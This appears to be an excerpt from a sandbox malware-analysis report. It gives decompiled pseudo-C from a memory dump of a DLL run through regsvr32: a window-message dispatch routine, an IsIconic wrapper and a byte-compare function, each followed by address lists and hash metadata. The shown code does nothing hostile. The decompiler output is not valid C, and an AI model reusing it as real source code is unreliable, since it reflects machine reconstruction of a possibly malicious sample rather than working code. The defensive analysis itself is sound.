                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												goto L49;
                                                                                                                											case 3:
                                                                                                                												_push(__esi);
                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												goto L42;
                                                                                                                											case 4:
                                                                                                                												_push(__esi);
                                                                                                                												L44:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L105;
                                                                                                                											case 5:
                                                                                                                												__ecx = __ebp - 0x28;
                                                                                                                												E1000C4AC(__ebp - 0x28) =  *(__esi + 4);
                                                                                                                												__ecx = __ebp - 0x7c;
                                                                                                                												 *((char*)(__ebp - 4)) = 1;
                                                                                                                												 *(__ebp - 0x24) =  *(__esi + 4);
                                                                                                                												__eax = E100128F2(__ecx, __eflags);
                                                                                                                												__eax =  *__esi;
                                                                                                                												__esi =  *(__esi + 8);
                                                                                                                												 *((char*)(__ebp - 4)) = 2;
                                                                                                                												 *(__ebp - 0x5c) = __eax;
                                                                                                                												__eax = E10014011(__ecx, __edi, __esi, __eflags, __eax);
                                                                                                                												__eflags = __eax;
                                                                                                                												if(__eflags == 0) {
                                                                                                                													__eax =  *(__edi + 0x4c);
                                                                                                                													__eflags = __eax;
                                                                                                                													if(__eflags != 0) {
                                                                                                                														__ecx = __eax + 0x24;
                                                                                                                														__eax = E10021462(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
                                                                                                                														__eflags = __eax;
                                                                                                                														if(__eflags != 0) {
                                                                                                                															 *(__ebp - 0x2c) = __eax;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													__eax = __ebp - 0x7c;
                                                                                                                												}
                                                                                                                												_push(__esi);
                                                                                                                												_push(__eax);
                                                                                                                												__eax = __ebp - 0x28;
                                                                                                                												_push(__ebp - 0x28);
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                                                                                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
                                                                                                                												__ecx = __ebp - 0x7c;
                                                                                                                												 *(__ebp - 0x10) = __ebp - 0x28;
                                                                                                                												 *((char*)(__ebp - 4)) = 1;
                                                                                                                												__eax = E10014A18(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
                                                                                                                												goto L59;
                                                                                                                											case 6:
                                                                                                                												__ecx = __ebp - 0x28;
                                                                                                                												E1000C4AC(__ebp - 0x28) =  *(__esi + 4);
                                                                                                                												_push( *(__esi + 8));
                                                                                                                												 *(__ebp - 0x24) =  *(__esi + 4);
                                                                                                                												__eax = __ebp - 0x28;
                                                                                                                												_push(__ebp - 0x28);
                                                                                                                												__ecx = __edi;
                                                                                                                												 *((char*)(__ebp - 4)) = 3;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												_t95 = __ebp - 0x24;
                                                                                                                												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
                                                                                                                												__eflags =  *_t95;
                                                                                                                												 *(__ebp - 0x10) = __ebp - 0x28;
                                                                                                                												L59:
                                                                                                                												__ecx = __ebp - 0x28;
                                                                                                                												 *((char*)(__ebp - 4)) = 0;
                                                                                                                												__eax = L1000CD56(__ecx);
                                                                                                                												goto L106;
                                                                                                                											case 7:
                                                                                                                												__eax =  *(__ebp + 0xc);
                                                                                                                												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												__eflags = __eax;
                                                                                                                												_push(__eax);
                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp, __esi);
                                                                                                                												goto L61;
                                                                                                                											case 8:
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												goto L42;
                                                                                                                											case 9:
                                                                                                                												goto L103;
                                                                                                                											case 0xa:
                                                                                                                												_push(__esi);
                                                                                                                												_push(E1001E527(__ebx, __ecx, __edi, __esi, __eflags));
                                                                                                                												__eax =  *(__ebp + 0xc);
                                                                                                                												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												L61:
                                                                                                                												_push(__eax);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												L49:
                                                                                                                												_push(__eax);
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L105;
                                                                                                                											case 0xb:
                                                                                                                												_push(__esi);
                                                                                                                												goto L87;
                                                                                                                											case 0xc:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L90;
                                                                                                                											case 0xd:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L106;
                                                                                                                											case 0xe:
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												goto L81;
                                                                                                                											case 0xf:
                                                                                                                												__esi = __esi >> 0x10;
                                                                                                                												__eax = __ax;
                                                                                                                												_push(__ax);
                                                                                                                												__eax = __si;
                                                                                                                												goto L81;
                                                                                                                											case 0x10:
                                                                                                                												_push(__esi >> 0x10);
                                                                                                                												__eax = __si & 0x0000ffff;
                                                                                                                												goto L95;
                                                                                                                											case 0x11:
                                                                                                                												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
                                                                                                                												L87:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L88;
                                                                                                                											case 0x12:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L105;
                                                                                                                											case 0x13:
                                                                                                                												_push(E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
                                                                                                                												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
                                                                                                                												__eax = 0;
                                                                                                                												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                                                                                                                												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
                                                                                                                												goto L93;
                                                                                                                											case 0x14:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__eax = E1000CCCE(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                												goto L76;
                                                                                                                											case 0x15:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__eax = E1001E527(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                												goto L76;
                                                                                                                											case 0x16:
                                                                                                                												__esi = __esi >> 0x10;
                                                                                                                												__eax = __ax;
                                                                                                                												_push(__ax);
                                                                                                                												__eax = __si;
                                                                                                                												_push(__si);
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__eax = E1001E527(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                												goto L93;
                                                                                                                											case 0x17:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L75;
                                                                                                                											case 0x18:
                                                                                                                												_push(__esi);
                                                                                                                												L75:
                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp);
                                                                                                                												L76:
                                                                                                                												_push(__eax);
                                                                                                                												goto L90;
                                                                                                                											case 0x19:
                                                                                                                												_push(__esi >> 0x10);
                                                                                                                												__eax = __si & 0x0000ffff;
                                                                                                                												goto L79;
                                                                                                                											case 0x1a:
                                                                                                                												__eax = __si;
                                                                                                                												__eflags = __esi;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__ecx);
                                                                                                                												L79:
                                                                                                                												_push(__eax);
                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												goto L93;
                                                                                                                											case 0x1b:
                                                                                                                												_push(__esi);
                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												L81:
                                                                                                                												_push(__eax);
                                                                                                                												goto L88;
                                                                                                                											case 0x1c:
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax = E10013FEA(__ebx, __ecx, __ebp, __esi);
                                                                                                                												goto L92;
                                                                                                                											case 0x1d:
                                                                                                                												__ecx =  *(__ebp + 0xc);
                                                                                                                												__edx = __cx;
                                                                                                                												__ecx =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												__eflags = __eax - 0x2a;
                                                                                                                												__ecx = __cx;
                                                                                                                												 *((intOrPtr*)(__ebp + 8)) = __edx;
                                                                                                                												 *(__ebp + 0xc) = __ecx;
                                                                                                                												if(__eax != 0x2a) {
                                                                                                                													_push(__ecx);
                                                                                                                													_push(__edx);
                                                                                                                													L88:
                                                                                                                													__ecx = __edi;
                                                                                                                													__eax =  *__ebx();
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												_push( *((intOrPtr*)(__ebp + 8)));
                                                                                                                												goto L96;
                                                                                                                											case 0x1e:
                                                                                                                												_push(__esi);
                                                                                                                												L90:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L106;
                                                                                                                											case 0x1f:
                                                                                                                												_push(__esi);
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L2;
                                                                                                                											case 0x20:
                                                                                                                												__eax = __si;
                                                                                                                												__eflags = __esi;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__ecx);
                                                                                                                												L42:
                                                                                                                												_push(__eax);
                                                                                                                												goto L104;
                                                                                                                											case 0x21:
                                                                                                                												__eax =  *(__ebp + 0xc);
                                                                                                                												_push(__esi);
                                                                                                                												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												__eflags = __eax;
                                                                                                                												L92:
                                                                                                                												_push(__eax);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												L93:
                                                                                                                												_push(__eax);
                                                                                                                												goto L96;
                                                                                                                											case 0x22:
                                                                                                                												__eax = __si;
                                                                                                                												__eflags = __esi;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__si);
                                                                                                                												L95:
                                                                                                                												_push(__eax);
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												L96:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L106;
                                                                                                                											case 0x23:
                                                                                                                												__eax = __si;
                                                                                                                												__esi = __esi >> 0x10;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__si);
                                                                                                                												_push(__si);
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												_push( *(__ebp + 0xc) & 0x0000ffff);
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												L6:
                                                                                                                												__eflags = _t185;
                                                                                                                												if(_t185 != 0) {
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												goto L39;
                                                                                                                											case 0x24:
                                                                                                                												goto L106;
                                                                                                                											case 0x25:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												__eflags = __eax;
                                                                                                                												 *(__ebp - 0x10) = __eax;
                                                                                                                												if(__eax == 0) {
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												L39:
                                                                                                                												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                                                                                												E100128B8(_t225 - 0x14);
                                                                                                                												_t163 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												goto L40;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									_t170 =  *(_t225 - 0x18);
                                                                                                                									_t58 =  &(_t170[1]);
                                                                                                                									 *_t58 = _t170[1] & 0x00000000;
                                                                                                                									__eflags =  *_t58;
                                                                                                                									E100128B8(_t225 - 0x14);
                                                                                                                									goto L39;
                                                                                                                								}
                                                                                                                								_t173 = _t194;
                                                                                                                								__eflags =  *(_t225 + 0x10) - _t173[2];
                                                                                                                								if( *(_t225 + 0x10) != _t173[2]) {
                                                                                                                									goto L25;
                                                                                                                								}
                                                                                                                								_t196 = _t173[1];
                                                                                                                								 *(_t225 + 0x10) = _t196;
                                                                                                                								E100128B8(_t225 - 0x14);
                                                                                                                								__eflags = _t196;
                                                                                                                								if(_t196 == 0) {
                                                                                                                									goto L39;
                                                                                                                								}
                                                                                                                								__eflags =  *(_t225 + 8) - 0xc000;
                                                                                                                								if( *(_t225 + 8) < 0xc000) {
                                                                                                                									goto L29;
                                                                                                                								}
                                                                                                                								goto L102;
                                                                                                                							}
                                                                                                                							__eflags =  *(_t147 + 0x74);
                                                                                                                							if( *(_t147 + 0x74) <= 0) {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							__eflags = _t189 - 0x200;
                                                                                                                							if(_t189 < 0x200) {
                                                                                                                								L16:
                                                                                                                								__eflags = _t189 - 0x100;
                                                                                                                								if(_t189 < 0x100) {
                                                                                                                									L18:
                                                                                                                									__eflags = _t189 - 0x281 - 0x10;
                                                                                                                									if(_t189 - 0x281 > 0x10) {
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									L19:
                                                                                                                									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
                                                                                                                									__eflags = _t177;
                                                                                                                									if(_t177 != 0) {
                                                                                                                										goto L106;
                                                                                                                									}
                                                                                                                									goto L20;
                                                                                                                								}
                                                                                                                								__eflags = _t189 - 0x10f;
                                                                                                                								if(_t189 <= 0x10f) {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							__eflags = _t189 - 0x209;
                                                                                                                							if(_t189 <= 0x209) {
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							goto L16;
                                                                                                                						} else {
                                                                                                                							_t181 = E10015E81(_t189, _t222, _t222, _t224, _t224 >> 0x10);
                                                                                                                							__eflags = _t181;
                                                                                                                							if(_t181 != 0) {
                                                                                                                								L2:
                                                                                                                								 *((intOrPtr*)(_t225 - 0x10)) = 1;
                                                                                                                								L106:
                                                                                                                								_t160 =  *((intOrPtr*)(_t225 + 0x14));
                                                                                                                								if(_t160 != 0) {
                                                                                                                									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
                                                                                                                								}
                                                                                                                								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                                                                                								E100128B8(_t225 - 0x14);
                                                                                                                								_t163 = 1;
                                                                                                                								L40:
                                                                                                                								return E10047725(_t163);
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t217 =  *(_t225 + 0x10);
                                                                                                                					__eflags =  *_t217;
                                                                                                                					if( *_t217 == 0) {
                                                                                                                						goto L39;
                                                                                                                					}
                                                                                                                					_push(_t225 - 0x10);
                                                                                                                					_push(_t217);
                                                                                                                					_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                                					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_push( *(_t225 + 0x10));
                                                                                                                				_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                                				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
                                                                                                                					goto L39;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}

























                                                                                                                0x10016779
                                                                                                                0x1001677a
                                                                                                                0x100166b0
                                                                                                                0x100166b0
                                                                                                                0x100166b1
                                                                                                                0x100166b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167a2
                                                                                                                0x100167a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167b6
                                                                                                                0x100167b9
                                                                                                                0x100167ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167c5
                                                                                                                0x100167c8
                                                                                                                0x100167cb
                                                                                                                0x100167cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167d9
                                                                                                                0x100167da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016698
                                                                                                                0x100168a1
                                                                                                                0x100168a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016689
                                                                                                                0x1001668b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167ea
                                                                                                                0x100167f1
                                                                                                                0x100167f2
                                                                                                                0x100167f4
                                                                                                                0x100167f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167ff
                                                                                                                0x10016802
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016809
                                                                                                                0x1001680c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016815
                                                                                                                0x10016818
                                                                                                                0x1001681b
                                                                                                                0x1001681c
                                                                                                                0x1001681f
                                                                                                                0x10016820
                                                                                                                0x10016823
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001682d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016832
                                                                                                                0x10016833
                                                                                                                0x10016833
                                                                                                                0x10016838
                                                                                                                0x10016838
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016840
                                                                                                                0x10016841
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016846
                                                                                                                0x10016849
                                                                                                                0x1001684c
                                                                                                                0x1001684f
                                                                                                                0x10016850
                                                                                                                0x10016850
                                                                                                                0x10016854
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001685b
                                                                                                                0x1001685f
                                                                                                                0x10016864
                                                                                                                0x10016864
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001686a
                                                                                                                0x1001686d
                                                                                                                0x1001686f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016876
                                                                                                                0x10016879
                                                                                                                0x1001687c
                                                                                                                0x1001687f
                                                                                                                0x10016882
                                                                                                                0x10016885
                                                                                                                0x10016888
                                                                                                                0x1001688b
                                                                                                                0x1001689c
                                                                                                                0x1001689d
                                                                                                                0x100168a4
                                                                                                                0x100168a4
                                                                                                                0x100168a6
                                                                                                                0x00000000
                                                                                                                0x100168a6
                                                                                                                0x10016893
                                                                                                                0x10016894
                                                                                                                0x10016897
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168ad
                                                                                                                0x100168ae
                                                                                                                0x100168ae
                                                                                                                0x100168b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168d7
                                                                                                                0x100168d8
                                                                                                                0x100168db
                                                                                                                0x100168dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016662
                                                                                                                0x10016665
                                                                                                                0x10016668
                                                                                                                0x1001666b
                                                                                                                0x1001666c
                                                                                                                0x1001666c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168b4
                                                                                                                0x100168b7
                                                                                                                0x100168b8
                                                                                                                0x100168b8
                                                                                                                0x100168bb
                                                                                                                0x100168bb
                                                                                                                0x100168bc
                                                                                                                0x100168c0
                                                                                                                0x100168c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168c3
                                                                                                                0x100168c6
                                                                                                                0x100168c9
                                                                                                                0x100168cc
                                                                                                                0x100168cd
                                                                                                                0x100168cd
                                                                                                                0x100168ce
                                                                                                                0x100168d1
                                                                                                                0x100168d1
                                                                                                                0x100168d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168e4
                                                                                                                0x100168e7
                                                                                                                0x100168ea
                                                                                                                0x100168ed
                                                                                                                0x100168ee
                                                                                                                0x100168f2
                                                                                                                0x100168f5
                                                                                                                0x100168f6
                                                                                                                0x100168fa
                                                                                                                0x100168fb
                                                                                                                0x100168fd
                                                                                                                0x100168ff
                                                                                                                0x100164a8
                                                                                                                0x100164a8
                                                                                                                0x100164aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016907
                                                                                                                0x10016909
                                                                                                                0x1001690b
                                                                                                                0x1001690d
                                                                                                                0x10016910
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001664c
                                                                                                                0x1001664c
                                                                                                                0x10016653
                                                                                                                0x10016658
                                                                                                                0x10016658
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100165ef
                                                                                                                0x1001663d
                                                                                                                0x10016640
                                                                                                                0x10016640
                                                                                                                0x10016640
                                                                                                                0x10016647
                                                                                                                0x00000000
                                                                                                                0x10016647
                                                                                                                0x1001656f
                                                                                                                0x10016571
                                                                                                                0x10016574
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016576
                                                                                                                0x1001657c
                                                                                                                0x1001657f
                                                                                                                0x10016584
                                                                                                                0x10016586
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001658c
                                                                                                                0x10016593
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016595
                                                                                                                0x100164ed
                                                                                                                0x100164f1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 34f6f1689c6f1fe59412e6c3379c9def9c694dafd6070cd8b35c4354a0752127
                                                                                                                • Instruction ID: 6f60986b119c3be40768c945038ae1be506edf061b984a87b6ee2efb94c889f8
                                                                                                                • Opcode Fuzzy Hash: 34f6f1689c6f1fe59412e6c3379c9def9c694dafd6070cd8b35c4354a0752127
                                                                                                                • Instruction Fuzzy Hash: 30F15A74A0025AEFDF14DF64CC90AAE7BA9FF08354F118129F815AF291DB35E981DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100014C4(void* __ecx) {
                                                                                                                
                                                                                                                				return IsIconic( *(__ecx + 0x20));
                                                                                                                			}



                                                                                                                0x100031a2

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Iconic
                                                                                                                • String ID:
                                                                                                                • API String ID: 110040809-0
                                                                                                                • Opcode ID: a6075f7090f9a60b8c602da68f33975638b429c5d6b1f9f169a5d4623d5fa5c8
                                                                                                                • Instruction ID: df37bff47b6fd1b3b5054d138b8d70c21f5bc54fc6c337dd5c71f3a3c6f14c23
                                                                                                                • Opcode Fuzzy Hash: a6075f7090f9a60b8c602da68f33975638b429c5d6b1f9f169a5d4623d5fa5c8
                                                                                                                • Instruction Fuzzy Hash: D2A002B54101209BEE12DF10CE5C5C93B35FB4938633441D9E4895D035C7228422EA40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004A7B7(signed char* _a4, signed char* _a8, signed int _a12) {
                                                                                                                				signed int _t984;
                                                                                                                				void* _t986;
                                                                                                                				signed int _t988;
                                                                                                                				void* _t989;
                                                                                                                				void* _t991;
                                                                                                                				void* _t993;
                                                                                                                				void* _t994;
                                                                                                                				void* _t996;
                                                                                                                				void* _t998;
                                                                                                                				void* _t1001;
                                                                                                                				void* _t1003;
                                                                                                                				void* _t1005;
                                                                                                                				signed char* _t1006;
                                                                                                                				void* _t1007;
                                                                                                                				signed int _t1140;
                                                                                                                				signed char* _t1144;
                                                                                                                				signed char* _t1145;
                                                                                                                				signed char* _t1146;
                                                                                                                				signed char* _t1147;
                                                                                                                				void* _t1173;
                                                                                                                				signed int _t1174;
                                                                                                                				void* _t1175;
                                                                                                                				signed char* _t1176;
                                                                                                                				signed char* _t1177;
                                                                                                                				signed char* _t1178;
                                                                                                                				void* _t1188;
                                                                                                                				void* _t1190;
                                                                                                                				void* _t1192;
                                                                                                                				void* _t1195;
                                                                                                                				void* _t1197;
                                                                                                                				void* _t1199;
                                                                                                                				void* _t1202;
                                                                                                                				void* _t1204;
                                                                                                                				void* _t1206;
                                                                                                                				void* _t1209;
                                                                                                                				void* _t1211;
                                                                                                                				void* _t1213;
                                                                                                                				void* _t1216;
                                                                                                                				void* _t1218;
                                                                                                                				void* _t1220;
                                                                                                                				void* _t1223;
                                                                                                                				void* _t1225;
                                                                                                                				void* _t1227;
                                                                                                                				void* _t1230;
                                                                                                                				void* _t1232;
                                                                                                                				void* _t1234;
                                                                                                                				void* _t1237;
                                                                                                                				void* _t1239;
                                                                                                                				void* _t1241;
                                                                                                                
                                                                                                                				_t1174 = _a12;
                                                                                                                				_t984 = _t1174;
                                                                                                                				if(_t984 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t986 = _t984 - 1;
                                                                                                                				if(_t986 == 0) {
                                                                                                                					_t988 =  *_a4 & 0x000000ff;
                                                                                                                					_t1140 =  *_a8 & 0x000000ff;
                                                                                                                					L426:
                                                                                                                					_t989 = _t988 - _t1140;
                                                                                                                					if(_t989 == 0) {
                                                                                                                						L438:
                                                                                                                						return _t989;
                                                                                                                					}
                                                                                                                					return (0 | _t989 > 0x00000000) + (0 | _t989 > 0x00000000) - 1;
                                                                                                                				}
                                                                                                                				_t991 = _t986 - 1;
                                                                                                                				if(_t991 == 0) {
                                                                                                                					_t1144 = _a4;
                                                                                                                					_t1176 = _a8;
                                                                                                                					_t993 = ( *_t1144 & 0x000000ff) - ( *_t1176 & 0x000000ff);
                                                                                                                					if(_t993 == 0) {
                                                                                                                						L435:
                                                                                                                						_t988 = _t1144[1] & 0x000000ff;
                                                                                                                						_t1140 = _t1176[1] & 0x000000ff;
                                                                                                                						goto L426;
                                                                                                                					}
                                                                                                                					_t989 = (0 | _t993 > 0x00000000) + (0 | _t993 > 0x00000000) - 1;
                                                                                                                					if(_t989 != 0) {
                                                                                                                						goto L438;
                                                                                                                					}
                                                                                                                					goto L435;
                                                                                                                				}
                                                                                                                				_t994 = _t991 - 1;
                                                                                                                				if(_t994 == 0) {
                                                                                                                					_t1145 = _a4;
                                                                                                                					_t1177 = _a8;
                                                                                                                					_t996 = ( *_t1145 & 0x000000ff) - ( *_t1177 & 0x000000ff);
                                                                                                                					if(_t996 == 0) {
                                                                                                                						L430:
                                                                                                                						_t998 = (_t1145[1] & 0x000000ff) - (_t1177[1] & 0x000000ff);
                                                                                                                						if(_t998 == 0) {
                                                                                                                							L432:
                                                                                                                							_t988 = _t1145[2] & 0x000000ff;
                                                                                                                							_t1140 = _t1177[2] & 0x000000ff;
                                                                                                                							goto L426;
                                                                                                                						}
                                                                                                                						_t989 = (0 | _t998 > 0x00000000) + (0 | _t998 > 0x00000000) - 1;
                                                                                                                						if(_t989 != 0) {
                                                                                                                							goto L438;
                                                                                                                						}
                                                                                                                						goto L432;
                                                                                                                					}
                                                                                                                					_t989 = (0 | _t996 > 0x00000000) + (0 | _t996 > 0x00000000) - 1;
                                                                                                                					if(_t989 != 0) {
                                                                                                                						goto L438;
                                                                                                                					}
                                                                                                                					goto L430;
                                                                                                                				}
                                                                                                                				if(_t994 == 1) {
                                                                                                                					_t1146 = _a4;
                                                                                                                					_t1178 = _a8;
                                                                                                                					_t1001 = ( *_t1146 & 0x000000ff) - ( *_t1178 & 0x000000ff);
                                                                                                                					if(_t1001 == 0) {
                                                                                                                						L421:
                                                                                                                						_t1003 = (_t1146[1] & 0x000000ff) - (_t1178[1] & 0x000000ff);
                                                                                                                						if(_t1003 == 0) {
                                                                                                                							L423:
                                                                                                                							_t1005 = (_t1146[2] & 0x000000ff) - (_t1178[2] & 0x000000ff);
                                                                                                                							if(_t1005 == 0) {
                                                                                                                								L425:
                                                                                                                								_t988 = _t1146[3] & 0x000000ff;
                                                                                                                								_t1140 = _t1178[3] & 0x000000ff;
                                                                                                                								goto L426;
                                                                                                                							}
                                                                                                                							_t989 = (0 | _t1005 > 0x00000000) + (0 | _t1005 > 0x00000000) - 1;
                                                                                                                							if(_t989 != 0) {
                                                                                                                								goto L438;
                                                                                                                							}
                                                                                                                							goto L425;
                                                                                                                						}
                                                                                                                						_t989 = (0 | _t1003 > 0x00000000) + (0 | _t1003 > 0x00000000) - 1;
                                                                                                                						if(_t989 != 0) {
                                                                                                                							goto L438;
                                                                                                                						}
                                                                                                                						goto L423;
